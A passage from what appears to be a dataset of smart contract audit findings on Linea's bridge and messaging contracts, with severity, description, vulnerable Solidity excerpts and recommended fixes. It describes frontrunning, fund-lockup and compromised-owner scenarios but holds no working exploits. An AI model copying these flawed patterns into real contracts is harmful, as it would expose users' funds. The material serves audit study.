setting a different bridge via `setCustomContract`. Although, the team states that the role will be controlled by a multi-sig which makes frontrunning less likely to happen.\\n```\\nfunction setCustomContract(\\n address \\_nativeToken,\\n address \\_targetContract\\n) external onlyOwner isNewToken(\\_nativeToken) {\\n nativeToBridgedToken[\\_nativeToken] = \\_targetContract;\\n bridgedToNativeToken[\\_targetContract] = \\_nativeToken;\\n emit CustomContractSet(\\_nativeToken, \\_targetContract);\\n}\\n```\\n\\n```\\n} else {\\n bridgedToken = nativeMappingValue;\\n if (nativeMappingValue == EMPTY) {\\n // New token\\n bridgedToken = deployBridgedToken(\\_nativeToken, \\_tokenMetadata);\\n bridgedToNativeToken[bridgedToken] = \\_nativeToken;\\n nativeToBridgedToken[\\_nativeToken] = bridgedToken;\\n }\\n BridgedToken(bridgedToken).mint(\\_recipient, \\_amount);\\n}\\n```\\nчMake sure, a native token should bridge to a single target contract. A possible approach could be to check whether the `bridgedToNativeToken` for a target is `EMPTY` or not. If it's not `EMPTY`, it means it's already a bridge for a native token and the function should revert. The same can be achieved by adding the modifier `isNewToken(_targetContract)`.\\nNote:- However, it doesn't resolve the issue of frontrunning, even if the likelihood is less.чч```\\nfunction setCustomContract(\\n address \\_nativeToken,\\n address \\_targetContract\\n) external onlyOwner isNewToken(\\_nativeToken) {\\n nativeToBridgedToken[\\_nativeToken] = \\_targetContract;\\n bridgedToNativeToken[\\_targetContract] = \\_nativeToken;\\n emit CustomContractSet(\\_nativeToken, \\_targetContract);\\n}\\n```\\n -Updating Message Service Does Not Emit EventчmediumчResolution\\nThe recommendations are implemented by the Linea team in the pull request 69 with the final commit hash as `1fdd5cfc51c421ad9aaf8b2fd2b3e2ed86ffa898`\\nThe function `setMessageService` allows the owner to update the message service address. However, it does not emit any event reflecting the change. As a result, in case the owner gets compromised, it can silently add a malicious message service, exploiting users' funds. Since, there was no event emitted, off-chain monitoring tools wouldn't be able to trigger alarms and users would continue using rogue message service until and unless tracked manually.\\n```\\nfunction setMessageService(address \\_messageService) public onlyOwner {\\n messageService = IMessageService(\\_messageService);\\n}\\n```\\nчConsider emitting an event reflecting the update from the old message service to the new one.чч```\\nfunction setMessageService(address \\_messageService) public onlyOwner {\\n messageService = IMessageService(\\_messageService);\\n}\\n```\\n -Lock Solidity Version in pragmaчlowчContracts should be deployed with the same compiler version they have been tested with. Locking the pragma helps ensure that contracts do not accidentally get deployed using, for example, the latest compiler which may have higher risks of undiscovered bugs. Contracts may also be deployed by others and the pragma indicates the compiler version intended by the original authors.\\nSee Locking Pragmas in Ethereum Smart Contract Best Practices.\\n```\\npragma solidity ^0.8.19;\\n```\\n\\n```\\npragma solidity ^0.8.19;\\n```\\n\\n```\\npragma solidity ^0.8.19;\\n```\\n\\n```\\npragma solidity ^0.8.19;\\n```\\nчLock the Solidity version to the latest version before deploying the contracts to production.\\n```\\npragma solidity 0.8.19;\\n```\\nчч```\\npragma solidity ^0.8.19;\\n```\\n -TokenBridge Does Not Follow a 2-Step Approach for Ownership TransfersчlowчResolution\\nThe recommendations are implemented by the Linea team in the pull request 71 with the final commit hash as `8ebfd011675ea318b7067af52637192aa1126acd`\\n`TokenBridge` defines a privileged role Owner, however, it uses a single-step approach, which immediately transfers the ownership to the new address. If accidentally passed an incorrect address, the current owner will immediately lose control over the system as there is no fail-safe mechanism.\\nA safer approach would be to first propose the ownership to the new owner, and let the new owner accept the proposal to be the new owner. It will add a fail-safe mechanism for the current owner as in case it proposes ownership to an incorrect address, it will not immediately lose control, and may still propose again to a correct address.\\n```\\ncontract TokenBridge is ITokenBridge, PausableUpgradeable, OwnableUpgradeable {\\n```\\nчConsider moving to a 2-step approach for the ownership transfers as recommended above. Note:- Openzeppelin provides another helper utility as Ownable2StepUpgradeable which follows the recommended approachчч```\\ncontract TokenBridge is ITokenBridge, PausableUpgradeable, OwnableUpgradeable {\\n```\\n -Heavy Blocks May Affect Block Finalization, if the Gas Requirement Exceeds Block Gas LimitчhighчThe `sequencer` takes care of finalizing blocks by submitting proof, blocks' data, proof type, and parent state root hash. The team mentions that the blocks are finalized every 12s, and under general scenarios, the system will work fine. However, in cases where there are blocks containing lots of transactions and event logs, the function may require gas more than the block gas limit. As a consequence, it may affect block finalization or lead to a potential DoS.\\n```\\nfunction finalizeBlocks(\\n BlockData[] calldata \\_blocksData,\\n bytes calldata \\_proof,\\n uint256 \\_proofType,\\n bytes32 \\_parentStateRootHash\\n)\\n```\\nчWe advise the team to benchmark the cost associated per block for the finalization and how many blocks can be finalized in one rollup and add the limits accordingly for the prover/sequencer.чч```\\nfunction finalizeBlocks(\\n BlockData[] calldata \\_blocksData,\\n bytes calldata \\_proof,\\n uint256 \\_proofType,\\n bytes32 \\_parentStateRootHash\\n)\\n```\\n -Postman Can Incorrectly Deliver a Message While Still Collecting the FeesчhighчThe message service allows cross chain message delivery, where the user can define the parameters of the message as:\\nfrom: Sender of the message _to: Receiver of the message _fee: The fees, the sender wants to pay to the postman to deliver the message valueSent: The value in the native currency of the chain to be sent with the message messageNumber: Nonce value which increments for every message _calldata: Calldata for the message to be executed on the destination chain\\nThe postman estimates the gas before claiming/delivering the message on the destination chain, thus avoiding scenarios where the fees sent are less than the cost of claiming the message.\\nHowever, there is nothing that restricts the postman from sending the gas equal to the fees paid by the user. Although it contributes to the MEV, where the postman can select the messages with higher fees first and deliver them prior to others, it also opens up an opportunity where the postman can deliver a message incorrectly while still claiming the fees.\\nOne such scenario is, where the low-level call to target `_to` makes another sub-call to another address, let's say `x`. Let's assume, the `_to` address doesn't check, whether the call to address `x` was successful or not. Now, if the postman supplies a gas, which makes the top-level call succeed, but the low-level call to `x` fails silently, the postman will still be retrieving the fees of claiming the message, even though the message was not correctly delivered.\\n```\\n(bool success, bytes memory returnData) = \\_to.call{ value: \\_value }(\\_calldata);\\nif (!success) {\\n if (returnData.length > 0) {\\n assembly {\\n let data\\_size := mload(returnData)\\n revert(add(32, returnData), data\\_size)\\n }\\n } else {\\n revert MessageSendingFailed(\\_to);\\n }\\n}\\n```\\n\\n```\\n(bool success, bytes memory returnData) = \\_to.call{ value: \\_value }(\\_calldata);\\nif (!success) {\\n if (returnData.length > 0) {\\n assembly {\\n let data\\_size := mload(returnData)\\n revert(add(32, returnData), data\\_size)\\n }\\n } else {\\n revert MessageSendingFailed(\\_to);\\n }\\n}\\n```\\nчAnother parameter can be added to the message construct giving the user the option to define the amount of gas required to complete a transaction entirely. Also, a check can be added while claiming the message, to make sure the gas supplied by the postman is sufficient enough compared to the gas defined/demanded by the user. The cases, where the user can demand a huge amount of gas, can be simply avoided by doing the gas estimation, and if the demanded gas is more than the supplied fees, the postman will simply opt not to deliver the messageчч```\\n(bool success, bytes memory returnData) = \\_to.call{ value: \\_value }(\\_calldata);\\nif (!success) {\\n if (returnData.length > 0) {\\n assembly {\\n let data\\_size := mload(returnData)\\n revert(add(32, returnData), data\\_size)\\n }\\n } else {\\n revert MessageSendingFailed(\\_to);\\n }\\n}\\n```\\n -User's Funds Would Stuck if the Message Claim Failed on the Destination LayerчhighчWhen claiming the message on the destination layer, if the message failed to execute with various reasons (e.g. wrong target contract address, wrong contract logic, out of gas, malicious contract), the Ether sent with `sendMessage` on the original layer will be stuck, although the message can be retried later by the Postman or the user (could fail again)\\n```\\nuint256 messageNumber = nextMessageNumber;\\nuint256 valueSent = msg.value - \\_fee;\\n\\nbytes32 messageHash = keccak256(abi.encode(msg.sender, \\_to, \\_fee, valueSent, messageNumber, \\_calldata));\\n```\\n\\n```\\n(bool success, bytes memory returnData) = \\_to.call{ value: \\_value }(\\_calldata);\\nif (!success) {\\n if (returnData.length > 0) {\\n assembly {\\n let data\\_size := mload(returnData)\\n revert(add(32, returnData), data\\_size)\\n }\\n } else {\\n revert MessageSendingFailed(\\_to);\\n }\\n}\\n```\\n\\n```\\n(bool success, bytes memory returnData) = \\_to.call{ value: \\_value }(\\_calldata);\\nif (!success) {\\n if (returnData.length > 0) {\\n assembly {\\n let data\\_size := mload(returnData)\\n revert(add(32, returnData), data\\_size)\\n }\\n } else {\\n revert MessageSendingFailed(\\_to);\\n }\\n}\\n```\\nчAdd refund mechanism to refund users funds if the message failed to deliver on the destination layerчч```\\nuint256 messageNumber = nextMessageNumber;\\nuint256 valueSent = msg.value - \\_fee;\\n\\nbytes32 messageHash = keccak256(abi.encode(msg.sender, \\_to, \\_fee, valueSent, messageNumber, \\_calldata));\\n```\\n -Front Running finalizeBlocks When Sequencers Are DecentralizedчhighчWhen sequencer is decentralized in the future, one sequencer could front run another sequencer's `finalizeBlocks` transaction, without doing the actual proving and sequencing, and steal the reward for sequencing if there is one. Once the frontrunner's `finalizeBlocks` is executed, the original sequencer's transaction would fail as `currentL2BlockNumber` would increment by one and state root hash won't match, as a result the original sequencer's sequencing and proving work will be wasted.\\n```\\nfunction finalizeBlocks(\\n BlockData[] calldata \\_blocksData,\\n bytes calldata \\_proof,\\n uint256 \\_proofType,\\n bytes32 \\_parentStateRootHash\\n)\\n external\\n whenTypeNotPaused(PROVING\\_SYSTEM\\_PAUSE\\_TYPE)\\n whenTypeNotPaused(GENERAL\\_PAUSE\\_TYPE)\\n onlyRole(OPERATOR\\_ROLE)\\n{\\n if (stateRootHashes[currentL2BlockNumber] != \\_parentStateRootHash) {\\n revert StartingRootHashDoesNotMatch();\\n }\\n\\n \\_finalizeBlocks(\\_blocksData, \\_proof, \\_proofType, \\_parentStateRootHash, true);\\n}\\n```\\nчAdd the sequencer's address as one parameters in `_finalizeBlocks` function, and include the sequencer's address in the public input hash of the proof in verification function `_verifyProof`.\\n```\\nfunction _finalizeBlocks(\\n BlockData[] calldata _blocksData,\\n bytes memory _proof,\\n uint256 _proofType,\\n bytes32 _parentStateRootHash,\\n bool _shouldProve,\\n address _sequencer\\n )\\n```\\n\\n```\\n_verifyProof(\\n uint256(\\n keccak256(\\n abi.encode(\\n keccak256(abi.encodePacked(blockHashes)),\\n firstBlockNumber,\\n keccak256(abi.encodePacked(timestampHashes)),\\n keccak256(abi.encodePacked(hashOfRootHashes)),\\n keccak256(abi.encodePacked(_sequencer)\\n )\\n )\\n ) % MODULO_R,\\n _proofType,\\n _proof,\\n _parentStateRootHash\\n );\\n```\\nчч```\\nfunction finalizeBlocks(\\n BlockData[] calldata \\_blocksData,\\n bytes calldata \\_proof,\\n uint256 \\_proofType,\\n bytes32 \\_parentStateRootHash\\n)\\n external\\n whenTypeNotPaused(PROVING\\_SYSTEM\\_PAUSE\\_TYPE)\\n whenTypeNotPaused(GENERAL\\_PAUSE\\_TYPE)\\n onlyRole(OPERATOR\\_ROLE)\\n{\\n if (stateRootHashes[currentL2BlockNumber] != \\_parentStateRootHash) {\\n revert StartingRootHashDoesNotMatch();\\n }\\n\\n \\_finalizeBlocks(\\_blocksData, \\_proof, \\_proofType, \\_parentStateRootHash, true);\\n}\\n```\\n -User Funds Would Stuck if the Single Coordinator Is Offline or Censoring MessagesчhighчWhen user sends message from L1 to L2, the coordinator needs to post the messages to L2, this happens in the anchoring message(addL1L2MessageHashes) on L2, then the user or Postman can claim the message on L2. since there is only a single coordinator, if the coordinator is down or censoring messages sent from L1 to L2, users funds can stuck in L1, until the coordinator come back online or stops censoring the message, as there is no message cancel feature or message expire feature. Although the operator can pause message sending on L1 once the coordinator is down, but if the message is sent and not posted to L2 before the pause it will still stuck.\\n```\\nuint256 messageNumber = nextMessageNumber;\\nuint256 valueSent = msg.value - \\_fee;\\n\\nbytes32 messageHash = keccak256(abi.encode(msg.sender, \\_to, \\_fee, valueSent, messageNumber, \\_calldata));\\n```\\n\\n```\\nfunction addL1L2MessageHashes(bytes32[] calldata \\_messageHashes) external onlyRole(L1\\_L2\\_MESSAGE\\_SETTER\\_ROLE) {\\n uint256 messageHashesLength = \\_messageHashes.length;\\n\\n if (messageHashesLength > 100) {\\n revert MessageHashesListLengthHigherThanOneHundred(messageHashesLength);\\n }\\n\\n for (uint256 i; i < messageHashesLength; ) {\\n bytes32 messageHash = \\_messageHashes[i];\\n if (inboxL1L2MessageStatus[messageHash] == INBOX\\_STATUS\\_UNKNOWN) {\\n inboxL1L2MessageStatus[messageHash] = INBOX\\_STATUS\\_RECEIVED;\\n }\\n unchecked {\\n i++;\\n }\\n }\\n\\n emit L1L2MessageHashesAddedToInbox(\\_messageHashes);\\n}\\n```\\nчDecentralize coordinator and sequencer or enable user cancel or drop the message if message deadline has expired.чч```\\nuint256 messageNumber = nextMessageNumber;\\nuint256 valueSent = msg.value - \\_fee;\\n\\nbytes32 messageHash = keccak256(abi.encode(msg.sender, \\_to, \\_fee, valueSent, messageNumber, \\_calldata));\\n```\\n -Changing Verifier Address Doesn't Emit EventчhighчIn function `setVerifierAddress`, after the verifier address is changed, there is no event emitted, which means if the operator (security council) changes the verifier to a buggy verifier, or if the security council is compromised, the attacker can change the verifier to a malicious one, the unsuspecting user would still use the service, potentially lose funds due to the fraud transactions would be verified.\\n```\\nfunction setVerifierAddress(address \\_newVerifierAddress, uint256 \\_proofType) external onlyRole(DEFAULT\\_ADMIN\\_ROLE) {\\n if (\\_newVerifierAddress == address(0)) {\\n revert ZeroAddressNotAllowed();\\n }\\n verifiers[\\_proofType] = \\_newVerifierAddress;\\n}\\n```\\nчEmits event after changing verifier address including old verifier address, new verifier address and the caller accountчч```\\nfunction setVerifierAddress(address \\_newVerifierAddress, uint256 \\_proofType) external onlyRole(DEFAULT\\_ADMIN\\_ROLE) {\\n if (\\_newVerifierAddress == address(0)) {\\n revert ZeroAddressNotAllowed();\\n }\\n verifiers[\\_proofType] = \\_newVerifierAddress;\\n}\\n```\\n -L2 Blocks With Incorrect Timestamp Could Be FinalizedчmediumчIn `_finalizeBlocks` of `ZkEvmV2`, the current block timestamp `blockInfo.l2BlockTimestamp` should be greater or equal than the last L2 block timestamp and less or equal than the L1 block timestamp when `_finalizeBlocks` is executed. However the first check is missing, blocks with incorrect timestamp could be finalized, causing unintended system behavior\\n```\\nif (blockInfo.l2BlockTimestamp >= block.timestamp) {\\n revert BlockTimestampError();\\n}\\n```\\nчAdd the missing timestamp checkчч```\\nif (blockInfo.l2BlockTimestamp >= block.timestamp) {\\n revert BlockTimestampError();\\n}\\n```\\n -Rate Limiting Affecting the Usability and User's Funds SafetyчmediumчIn `claimMessage` of `L1MessageService` and `sendMessage` function of `L1MessageService` contract, function `_addUsedAmount` is used to rate limit the Ether amount (1000 Eth) sent from L2 to L1 in a time period (24 hours), this is problematic, usually user sends the funds to L1 when they need to exit from L2 to L1 especially when some security issues happened affecting their funds safety on L2, if there is a limit, the limit can be reached quickly by some whale sending large amount of Ether to L1, while other users cannot withdraw their funds to L1, putting their funds at risk. In addition, the limit can only be set and changed by the security council and security council can also pause message service at any time, blocking user withdraw funds from L2, this makes the L2->L1 message service more centralized.\\n```\\n\\_addUsedAmount(\\_fee + \\_value);\\n```\\n\\n```\\n\\_addUsedAmount(msg.value);\\n```\\n\\n```\\nfunction \\_addUsedAmount(uint256 \\_usedAmount) internal {\\n uint256 currentPeriodAmountTemp;\\n\\n if (currentPeriodEnd < block.timestamp) {\\n // Update period before proceeding\\n currentPeriodEnd = block.timestamp + periodInSeconds;\\n currentPeriodAmountTemp = \\_usedAmount;\\n } else {\\n currentPeriodAmountTemp = currentPeriodAmountInWei + \\_usedAmount;\\n }\\n\\n if (currentPeriodAmountTemp > limitInWei) {\\n revert RateLimitExceeded();\\n }\\n\\n currentPeriodAmountInWei = currentPeriodAmountTemp;\\n}\\n```\\nчRemove rate limiting for L2->L1 message serviceчч```\\n\\_addUsedAmount(\\_fee + \\_value);\\n```\\n -Front Running claimMessage on L1 and L2чmediumчThe front-runner on L1 or L2 can front run the `claimMessage` transaction, as long as the `fee` is greater than the gas cost of the claiming the message and `feeRecipient` is not set, consequently the `fee` will be transferred to the message.sender(the front runner) once the message is claimed. As a result, postman would lose the incentive to deliver(claim) the message on the destination layer.\\n```\\nif (\\_fee > 0) {\\n address feeReceiver = \\_feeRecipient == address(0) ? msg.sender : \\_feeRecipient;\\n (bool feePaymentSuccess, ) = feeReceiver.call{ value: \\_fee }(\"\");\\n if (!feePaymentSuccess) {\\n revert FeePaymentFailed(feeReceiver);\\n }\\n```\\n\\n```\\nif (\\_fee > 0) {\\n address feeReceiver = \\_feeRecipient == address(0) ? msg.sender : \\_feeRecipient;\\n (bool feePaymentSuccess, ) = feeReceiver.call{ value: \\_fee }(\"\");\\n if (!feePaymentSuccess) {\\n revert FeePaymentFailed(feeReceiver);\\n }\\n}\\n```\\nчThere are a few protections against front running including flashbots service. Another option to mitigate front running is to avoid using msg.sender and have user use the signed `claimMessage` transaction by the Postman to claim the message on the destination layerчч```\\nif (\\_fee > 0) {\\n address feeReceiver = \\_feeRecipient == address(0) ? msg.sender : \\_feeRecipient;\\n (bool feePaymentSuccess, ) = feeReceiver.call{ value: \\_fee }(\"\");\\n if (!feePaymentSuccess) {\\n revert FeePaymentFailed(feeReceiver);\\n }\\n```\\n -Contracts Not Well Designed for UpgradesчmediumчInconsistent Storage Layout\\nThe Contracts introduce some buffer space in the storage layout to cope with the scenarios where new storage variables can be added if a need exists to upgrade the contracts to a newer version. This helps in reducing the chances of potential storage collisions. However, the storage layout concerning the buffer space is inconsistent, and multiple variations have been observed.\\n`PauseManager`, `RateLimitter`, and `MessageServiceBase` adds a buffer space of 10, contrary to other contracts which define the space as 50.\\n```\\nuint256[10] private \\_gap;\\n```\\n\\n```\\nuint256[10] private \\_gap;\\n```\\n\\n```\\nuint256[10] private \\_\\_base\\_gap;\\n```\\n\\n`L2MessageService` defines the buffer space prior to its existing storage variables.\\n```\\nuint256[50] private \\_\\_gap\\_L2MessageService;\\n```\\n\\nIf there exists a need to inherit from this contract in the future, the derived contract has to define the buffer space first, similar to `L2MessageService`. If it doesn't, `L2MessageService` can't have more storage variables. If it adds them, it will collide with the derived contract's storage slots.\\n2. `RateLimiter` and `MessageServiceBase` initializes values without the modifier `onlyInitializing`\\n```\\nfunction \\_\\_RateLimiter\\_init(uint256 \\_periodInSeconds, uint256 \\_limitInWei) internal {\\n```\\n\\n```\\nfunction \\_init\\_MessageServiceBase(address \\_messageService, address \\_remoteSender) internal {\\n```\\n\\nThe modifier `onlyInitializing` makes sure that the function should only be invoked by a function marked as `initializer`. However, it is absent here, which means these are normal internal functions that can be utilized in any other function, thus opening opportunities for errors.чDefine a consistent storage layout. Consider a positive number `n` for the number of buffer space slots, such that, it is equal to any arbitrary number `d - No. of occupied storage slots`. For instance, if the arbitrary number is 50, and the contract has 20 occupied storage slots, the buffer space can be 50-20 = 30. It will maintain a consistent storage layout throughout the inheritance hierarchy.\\nFollow a consistent approach to defining buffer space. Currently, all the contracts, define the buffer space after their occupied storage slots, so it should be maintained in the `L2MessageService` as well.\\nDefine functions `__RateLimiter_init` and `_init_MessageServiceBase` as `onlyInitializing`.чч```\\nuint256[10] private \\_gap;\\n```\\n -Potential Code CorrectionsчlowчFunction `_updateL1L2MessageStatusToReceived` and `addL1L2MessageHashes` allows status update for already received/sent/claimed messages.\\n```\\nfunction \\_updateL1L2MessageStatusToReceived(bytes32[] memory \\_messageHashes) internal {\\n uint256 messageHashArrayLength = \\_messageHashes.length;\\n\\n for (uint256 i; i < messageHashArrayLength; ) {\\n bytes32 messageHash = \\_messageHashes[i];\\n uint256 existingStatus = outboxL1L2MessageStatus[messageHash];\\n\\n if (existingStatus == INBOX\\_STATUS\\_UNKNOWN) {\\n revert L1L2MessageNotSent(messageHash);\\n }\\n\\n if (existingStatus != OUTBOX\\_STATUS\\_RECEIVED) {\\n outboxL1L2MessageStatus[messageHash] = OUTBOX\\_STATUS\\_RECEIVED;\\n }\\n\\n unchecked {\\n i++;\\n }\\n }\\n\\n emit L1L2MessagesReceivedOnL2(\\_messageHashes);\\n}\\n```\\n\\n```\\nfunction addL1L2MessageHashes(bytes32[] calldata \\_messageHashes) external onlyRole(L1\\_L2\\_MESSAGE\\_SETTER\\_ROLE) {\\n uint256 messageHashesLength = \\_messageHashes.length;\\n\\n if (messageHashesLength > 100) {\\n revert MessageHashesListLengthHigherThanOneHundred(messageHashesLength);\\n }\\n\\n for (uint256 i; i < messageHashesLength; ) {\\n bytes32 messageHash = \\_messageHashes[i];\\n if (inboxL1L2MessageStatus[messageHash] == INBOX\\_STATUS\\_UNKNOWN) {\\n inboxL1L2MessageStatus[messageHash] = INBOX\\_STATUS\\_RECEIVED;\\n }\\n unchecked {\\n i++;\\n }\\n }\\n\\n emit L1L2MessageHashesAddedToInbox(\\_messageHashes);\\n```\\n\\nIt may trigger false alarms, as they will still be a part of `L1L2MessagesReceivedOnL2` and `L1L2MessageHashesAddedToInbox`.\\n`_updateL1L2MessageStatusToReceived` checks the status of L1->L2 messages as:\\n```\\nif (existingStatus == INBOX\\_STATUS\\_UNKNOWN) {\\n revert L1L2MessageNotSent(messageHash);\\n}\\n```\\n\\nHowever, the status is need to be checked with `OUTBOX_STATUS_UNKNOWN` instead of `INBOX_STATUS_UNKNOWN` as it is an outbox message. This creates a hindrance in the code readability and should be fixed.\\nArray `timestampHashes` stores `l2BlockTimestamp` as integers, contrary to the hashes that the variable name states.\\n```\\ntimestampHashes[i] = blockInfo.l2BlockTimestamp;\\n```\\n\\nUnused error declaration\\n```\\n \\* dev Thrown when the decoding action is invalid.\\n \\*/\\n\\nerror InvalidAction();\\n```\\n\\nTransactionDecoder defines an error as `InvalidAction` which is supposed to be thrown when the decoding action is invalid, as stated in NATSPEC comment. However, it is currently unutilized.чOnly update the status for sent messages in `_updateL1L2MessageStatusToReceived`, and unknown messages in `addL1L2MessageHashes` and revert otherwise, to avoid off-chain accounting errors.\\nCheck the status of L1->L2 sent message with `OUTBOX_STATUS_UNKNOWN` to increase code readability.\\nEither store timestamp hashes in the variable `timestampHashes` or update the variable name likewise.\\nRemove the error declaration if it is not serving any purpose.чч```\\nfunction \\_updateL1L2MessageStatusToReceived(bytes32[] memory \\_messageHashes) internal {\\n uint256 messageHashArrayLength = \\_messageHashes.length;\\n\\n for (uint256 i; i < messageHashArrayLength; ) {\\n bytes32 messageHash = \\_messageHashes[i];\\n uint256 existingStatus = outboxL1L2MessageStatus[messageHash];\\n\\n if (existingStatus == INBOX\\_STATUS\\_UNKNOWN) {\\n revert L1L2MessageNotSent(messageHash);\\n }\\n\\n if (existingStatus != OUTBOX\\_STATUS\\_RECEIVED) {\\n outboxL1L2MessageStatus[messageHash] = OUTBOX\\_STATUS\\_RECEIVED;\\n }\\n\\n unchecked {\\n i++;\\n }\\n }\\n\\n emit L1L2MessagesReceivedOnL2(\\_messageHashes);\\n}\\n```\\n -TransactionDecoder Does Not Account for the Missing Elements While Decoding a TransactionчlowчThe library tries to decode calldata from different transaction types, by jumping to the position of calldata element in the rlp encoding. These positions are:\\nEIP1559: 8\\nEIP2930: 7\\nLegacy: 6\\n```\\ndata = it.\\_skipTo(8).\\_toBytes();\\n```\\n\\n```\\ndata = it.\\_skipTo(7).\\_toBytes();\\n```\\n\\n```\\ndata = it.\\_skipTo(6).\\_toBytes();\\n```\\n\\nHowever, the decoder doesn't check whether the required element is there or not in the encoding provided.\\nThe decoder uses the library RLPReader to skip to the desired element in encoding. However, it doesn't revert in case there are not enough elements to skip to, and will simply return byte `0x00`, while still completing unnecessary iterations.\\n```\\nfunction \\_skipTo(Iterator memory \\_self, uint256 \\_skipToNum) internal pure returns (RLPItem memory item) {\\n uint256 ptr = \\_self.nextPtr;\\n uint256 itemLength = \\_itemLength(ptr);\\n \\_self.nextPtr = ptr + itemLength;\\n\\n for (uint256 i; i < \\_skipToNum - 1; ) {\\n ptr = \\_self.nextPtr;\\n itemLength = \\_itemLength(ptr);\\n \\_self.nextPtr = ptr + itemLength;\\n\\n unchecked {\\n i++;\\n }\\n }\\n\\n item.len = itemLength;\\n item.memPtr = ptr;\\n}\\n```\\n\\nAlthough it doesn't impose any security issue, as `ZkEvmV2` tries to decode an array of bytes32 hashes from the rlp encoded transaction. However, it may still lead to errors in other use cases if not handled correctly.\\n```\\nCodecV2.\\_extractXDomainAddHashes(TransactionDecoder.decodeTransaction(\\_transactions[\\_batchReceptionIndices[i]]))\\n```\\nчrlp library should revert if there are not enough elements to skip to in the encoding.чч```\\ndata = it.\\_skipTo(8).\\_toBytes();\\n```\\n -Incomplete Message State Check When Claiming Messages on L1 and L2чlowчWhen claiming message on L1 orL2, `_updateL2L1MessageStatusToClaimed` and `_updateL1L2MessageStatusToClaimed` are called to update the message status, however the message state check only checks status `INBOX_STATUS_RECEIVED` and is missing status `INBOX_STATUS_UNKNOWN`, which means the message is not picked up by the coordinator or the message is not sent on L1 or L2 and should be reverted. As a result, the claiming message could be reverted with a incorrect reason.\\n```\\nfunction \\_updateL2L1MessageStatusToClaimed(bytes32 \\_messageHash) internal {\\n if (inboxL2L1MessageStatus[\\_messageHash] != INBOX\\_STATUS\\_RECEIVED) {\\n revert MessageAlreadyClaimed();\\n }\\n\\n delete inboxL2L1MessageStatus[\\_messageHash];\\n\\n emit L2L1MessageClaimed(\\_messageHash);\\n}\\n```\\n\\n```\\n function \\_updateL1L2MessageStatusToClaimed(bytes32 \\_messageHash) internal {\\n if (inboxL1L2MessageStatus[\\_messageHash] != INBOX\\_STATUS\\_RECEIVED) {\\n revert MessageAlreadyClaimed();\\n }\\n\\n inboxL1L2MessageStatus[\\_messageHash] = INBOX\\_STATUS\\_CLAIMED;\\n\\n emit L1L2MessageClaimed(\\_messageHash);\\n }\\n}\\n```\\nчAdd the missing status check and relevant revert reason for status `INBOX_STATUS_UNKNOWN`чч```\\nfunction \\_updateL2L1MessageStatusToClaimed(bytes32 \\_messageHash) internal {\\n if (inboxL2L1MessageStatus[\\_messageHash] != INBOX\\_STATUS\\_RECEIVED) {\\n revert MessageAlreadyClaimed();\\n }\\n\\n delete inboxL2L1MessageStatus[\\_messageHash];\\n\\n emit L2L1MessageClaimed(\\_messageHash);\\n}\\n```\\n -Events Which May Trigger False Alarmsчlowч1- `PauseManager` allows `PAUSE_MANAGER_ROLE` to pause/unpause a type as:\\n```\\nfunction pauseByType(bytes32 \\_pauseType) external onlyRole(PAUSE\\_MANAGER\\_ROLE) {\\n pauseTypeStatuses[\\_pauseType] = true;\\n emit Paused(\\_msgSender(), \\_pauseType);\\n}\\n```\\n\\n```\\nfunction unPauseByType(bytes32 \\_pauseType) external onlyRole(PAUSE\\_MANAGER\\_ROLE) {\\n pauseTypeStatuses[\\_pauseType] = false;\\n emit UnPaused(\\_msgSender(), \\_pauseType);\\n}\\n```\\n\\nHowever, the functions don't check whether the given `_pauseType` has already been paused/unpaused or not and emits an event every time called. This may trigger false alarms for off-chain monitoring tools and may cause unnecessary panic.\\n2 - `RateLimitter` allows resetting the limit and used amount as:\\n```\\nfunction resetRateLimitAmount(uint256 \\_amount) external onlyRole(RATE\\_LIMIT\\_SETTER\\_ROLE) {\\n bool amountUsedLoweredToLimit;\\n\\n if (\\_amount < currentPeriodAmountInWei) {\\n currentPeriodAmountInWei = \\_amount;\\n amountUsedLoweredToLimit = true;\\n }\\n\\n limitInWei = \\_amount;\\n\\n emit LimitAmountChange(\\_msgSender(), \\_amount, amountUsedLoweredToLimit);\\n}\\n```\\n\\n```\\nfunction resetAmountUsedInPeriod() external onlyRole(RATE\\_LIMIT\\_SETTER\\_ROLE) {\\n currentPeriodAmountInWei = 0;\\n\\n emit AmountUsedInPeriodReset(\\_msgSender());\\n}\\n```\\n\\nHowever, it doesn't account for the scenarios where the function can be called after the current period ends and before a new period gets started. As the `currentPeriodAmountInWei` will still be holding the used amount of the last period, if the `RATE_LIMIT_SETTER_ROLE` tries to reset the limit with the lower value than the used amount, the function will emit the same event `LimitAmountChange` with the flag `amountUsedLoweredToLimit`.\\nAdding to it, the function will make `currentPeriodAmountInWei` = `limitInWei`, which means no more amount can be added as the used amount until the used amount is manually reset to 0, which points out to the fact that the used amount should be automatically reset, once the current period ends. Although it is handled automatically in function `_addUsedAmount`, however, if the new period has not yet started, it is supposed to be done in a 2-step approach i.e., first, reset the used amount and then the limit. It can be simplified by checking for the current period in the `resetRateLimitAmount` function itself.\\nThe same goes for the scenario where the used amount is reset after the current period ends. It will emit the same event as `AmountUsedInPeriodReset`\\nThese can create unnecessary confusion, as the events emitted don't consider the abovementioned scenarios.чConsider adding checks to make sure already paused/unpaused types don't emit respective events.\\nConsider emitting different events, or adding a flag in the events, that makes it easy to differentiate whether the limit and used amount are reset in the current period or after it has ended.\\nReset `currentPeriodAmountInWei` in function `resetRateLimitAmount` itself if the current period has ended.чч```\\nfunction pauseByType(bytes32 \\_pauseType) external onlyRole(PAUSE\\_MANAGER\\_ROLE) {\\n pauseTypeStatuses[\\_pauseType] = true;\\n emit Paused(\\_msgSender(), \\_pauseType);\\n}\\n```\\n -No Proper Trusted Setup AcknowledgedчhighчLinea uses Plonk proof system, which needs a preprocessed CRS (Common Reference String) for proving and verification, the Plonk system security is based on the existence of a trusted setup ceremony to compute the CRS, the current verifier uses a CRS created by one single party, which requires fully trust of the party to delete the toxic waste (trapdoor) which can be used to generate forged proof, undermining the security of the entire system\\n```\\nuint256 constant g2\\_srs\\_0\\_x\\_0 = 11559732032986387107991004021392285783925812861821192530917403151452391805634;\\nuint256 constant g2\\_srs\\_0\\_x\\_1 = 10857046999023057135944570762232829481370756359578518086990519993285655852781;\\nuint256 constant g2\\_srs\\_0\\_y\\_0 = 4082367875863433681332203403145435568316851327593401208105741076214120093531;\\nuint256 constant g2\\_srs\\_0\\_y\\_1 = 8495653923123431417604973247489272438418190587263600148770280649306958101930;\\n\\nuint256 constant g2\\_srs\\_1\\_x\\_0 = 18469474764091300207969441002824674761417641526767908873143851616926597782709;\\nuint256 constant g2\\_srs\\_1\\_x\\_1 = 